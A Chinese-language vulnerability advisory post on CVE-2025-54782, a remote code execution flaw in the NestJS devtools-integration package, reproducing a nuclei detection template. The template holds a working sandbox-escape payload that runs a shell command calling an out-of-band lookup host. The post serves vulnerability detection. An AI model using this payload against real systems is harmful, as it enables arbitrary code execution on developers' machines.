NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞信息

漏洞名称: NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-54782

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: NestJS是一个用于构建高效、可扩展的Node.js服务器端应用程序的框架。@nestjs/devtools-integration是NestJS的一个开发工具集成包,旨在为开发者提供便捷的开发体验。该包广泛用于NestJS应用的开发过程中,特别是在本地开发环境中。该漏洞存在于@nestjs/devtools-integration包的0.2.0及以下版本中,由于包中暴露了一个本地开发HTTP服务器,并且其API端点(/inspector/graph/interact)使用了不安全的JavaScript沙箱。由于沙箱的不当实现和缺少跨源保护,任何恶意网站都可以在访问该网站的开发者本地机器上执行任意代码。这种远程代码执行(RCE)漏洞的严重性在于,它不需要任何形式的认证即可被利用,且可以被自动化工具利用,导致严重的安全风险,包括但不限于数据泄露、服务中断以及在受害者的机器上执行恶意代码。

产品厂商: NestJS

产品名称: @nestjs/devtools-integration

影响版本: <= 0.2.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f203fdeff50045ca06185b57b1f8550c365d758f/http%2Fcves%2F2025%2FCVE-2025-54782.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

id: CVE-2025-54782

info:
  name: NestJS DevTools Integration - Remote Code Execution
  author: SeongHyeonJeon[nukunga]
  severity: critical
  description: |
    The @nestjs/devtools-integration package <= 0.2.0 is vulnerable to a Remote Code Execution (RCE) vulnerability.
    The package exposes a local development HTTP server with an API endpoint (/inspector/graph/interact) that uses an unsafe JavaScript sandbox.
    Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
  reference:
    - https://socket.dev/blog/nestjs-rce-vuln
    - https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54782
  classification:
    cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 9.4
    cve-id: CVE-2025-54782
    cwe-id: CWE-77, CWE-352, CWE-78
  tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth

http:
  - method: POST
    path:
      - "{{BaseURL}}/inspector/graph/interact"
    headers:
      Content-Type: "text/plain"
    body: |
      {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
NestJS DevTools Integration Remote Code Execution Vulnerability
http://example.com/2025/08/03/github_3032163418/
作者
lianccc
发布于
2025年8月3日
许可协议